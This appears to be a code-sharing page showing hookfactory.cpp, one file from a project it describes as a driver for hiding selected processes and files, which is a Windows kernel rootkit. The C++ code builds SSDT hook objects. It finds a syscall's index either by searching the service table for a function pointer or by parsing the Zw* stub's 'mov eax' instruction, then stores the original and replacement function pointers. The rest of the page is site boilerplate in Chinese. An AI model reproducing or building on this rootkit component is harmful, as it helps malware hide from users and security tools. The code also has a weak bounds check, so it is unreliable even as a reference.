hookfactory.cpp

来自「The main idea of this work is to create 」· C++ 代码 · 共 58 行

CPP
58
字号 
#include "HookFactory.h"
PHook CreateHook(IN const PVOID pNewFuncPtr,IN const ULONG funcID)
{
	ULONG TotalCount=pNtoskrnl->ServiceLimit;
	PNTPROC ServiceTable=pNtoskrnl->ServiceTable;

	if(funcID == TotalCount) 
		return NULL;

	PHook mNewHook = new Hook;
	// Save ID of function
	mNewHook->mFuncSST_ID = funcID;
	// Save true function ptr
	mNewHook->mpTrueFuncPtr = ServiceTable[funcID];
	// Save new  function ptr
	mNewHook->mpNewFuncPtr  = pNewFuncPtr;

	return mNewHook;
}	
PHook CreateHook(IN const PVOID pNewFuncPtr,IN const PVOID pTrueFuncPtr)
{
	ULONG TotalCount=pNtoskrnl->ServiceLimit;
	PNTPROC ServiceTable=pNtoskrnl->ServiceTable;

	// Searching function ID in SST
	ULONG index=0;
	for(;index<TotalCount;++index)
	{
		if(ServiceTable[index] == pTrueFuncPtr)
			break;
	}
	if(index == TotalCount) // Not found
		return NULL;

	return CreateHook(pNewFuncPtr,index);
}
PHook CreateHook(IN const PVOID pNewFuncPtr,IN PUNICODE_STRING function_name)
{
	/*	All Zw* functions exported by NTOSKRNL.exe start with :

	mov eax, ULONG // where ULONG is the index # of the syscall in th SSDT*/

	PNTPROC ServiceTable=pNtoskrnl->ServiceTable;

	PVOID pTrueFuncPtr_ZW=MmGetSystemRoutineAddress(function_name);

	// VAR 1
	if(pTrueFuncPtr_ZW == NULL)
		return NULL;

	ULONG mFuncID = *(PULONG)((PUCHAR) pTrueFuncPtr_ZW + 1);
	
	if( mFuncID == NULL)	
		return NULL;
	
    
	return CreateHook(pNewFuncPtr,mFuncID);
}

hookfactory.cpp - 源码说明

本页面展示了「The main idea of this work is to create a driver for hiding selected processes and files.」中的 hookfactory.cpp 源码文件,采用 C++ 编程语言编写,共 58 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与processes相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?